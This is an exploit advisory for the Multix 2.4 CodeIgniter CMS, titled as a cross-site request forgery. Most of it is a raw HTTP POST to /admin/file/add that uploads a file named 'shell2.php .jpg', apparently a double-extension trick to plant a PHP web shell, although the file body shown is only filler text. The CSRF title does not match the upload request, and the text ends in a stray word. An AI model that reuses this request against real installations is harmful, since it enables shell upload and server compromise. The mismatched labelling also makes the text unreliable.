Multix 2.4 Cross Site Request Forgery – Torchsec
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596
# Version: Version 2.4
# Tested on Ubuntu 18.04
-------Request-----------
POST /admin/file/add HTTP/1.1
Host: localhost
Content-Length: 466
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5Ve
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/file/add
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1;
Connection: close
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="file_title"
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"
Content-Type: image
asdasd
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="form1"
------WebKitFormBoundaryE0mBtYGic6umB5Ve--
Gloss